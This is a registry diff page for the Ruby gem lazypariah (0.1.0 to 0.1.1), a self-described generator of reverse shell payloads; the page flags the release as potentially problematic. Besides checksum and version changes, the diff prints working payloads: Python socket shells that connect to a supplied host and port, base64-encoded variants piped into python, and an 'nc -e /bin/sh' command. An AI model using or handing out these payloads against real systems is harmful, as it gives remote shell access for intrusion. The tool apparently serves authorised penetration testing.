lazypariah 0.1.0 → 0.1.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of lazypariah might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/bin/lazypariah +8 -8
- metadata +1 -1
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA256:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: 6182900507e209105702a8cd9c7162d56e0c547b5d8dcf50687fb8bc8b1e829e
|
4
|
+
data.tar.gz: 8f466d6c3aceb1c5892b08f62ab0123a0cce5102afb76e21cf6fc307512c1af2
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: dc0d4757c3eaacedb3fe2a6ffa2e9eb0a555b8b7ff1c987de39ee87f26ef8695eabca241d3028a6399958fa77a66ce4285d4e0573e773d22a420236c66fc4c08
|
7
|
+
data.tar.gz: e6924d7e4ba82968fdde5ad3e0d6056cc936c4938058d4f369a4d95f8672e2613365bc262f5a07e768511bc8348200d33cc91d7e3e9873e01432ee0984017bbd
|
data/bin/lazypariah
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
#!/usr/bin/env ruby
|
2
2
|
#
|
3
3
|
# Title: LAZYPARIAH
|
4
|
-
# Version: 0.1.
|
4
|
+
# Version: 0.1.1
|
5
5
|
# Description:
|
6
6
|
# LAZYPARIAH is a simple tool for generating various reverse shell payloads
|
7
7
|
# on the fly. It is intended to be used only in authorised circumstances by
|
@@ -27,7 +27,7 @@ require "erb"
|
|
27
27
|
|
28
28
|
# Define constants.
|
29
29
|
PROGRAM_NAME = "LAZYPARIAH".freeze()
|
30
|
-
PROGRAM_VERSION = "0.1.
|
30
|
+
PROGRAM_VERSION = "0.1.1".freeze()
|
31
31
|
EXECUTABLE_NAME = "lazypariah".freeze()
|
32
32
|
|
33
33
|
# Define payload list.
|
@@ -148,14 +148,14 @@ begin
|
|
148
148
|
when "python_c"
|
149
149
|
print_output("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'", url_encode=url_encode)
|
150
150
|
when "python3_b64"
|
151
|
-
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
|
152
|
-
print_output("echo #{code} | base64 -d | python3")
|
151
|
+
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
152
|
+
print_output("echo #{code} | base64 -d | python3", url_encode=url_encode)
|
153
153
|
when "python2_b64"
|
154
|
-
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
|
155
|
-
print_output("echo #{code} | base64 -d | python2")
|
154
|
+
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
155
|
+
print_output("echo #{code} | base64 -d | python2", url_encode=url_encode)
|
156
156
|
when "python_b64"
|
157
|
-
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
|
158
|
-
print_output("echo #{code} | base64 -d | python")
|
157
|
+
code = Base64.strict_encode64("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"#{ARGV[1]}\",#{ARGV[2]}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);")
|
158
|
+
print_output("echo #{code} | base64 -d | python", url_encode=url_encode)
|
159
159
|
when "nc"
|
160
160
|
print_output("nc -e /bin/sh #{ARGV[1]} #{ARGV[2]}", url_encode=url_encode)
|
161
161
|
when "nc_pipe"
|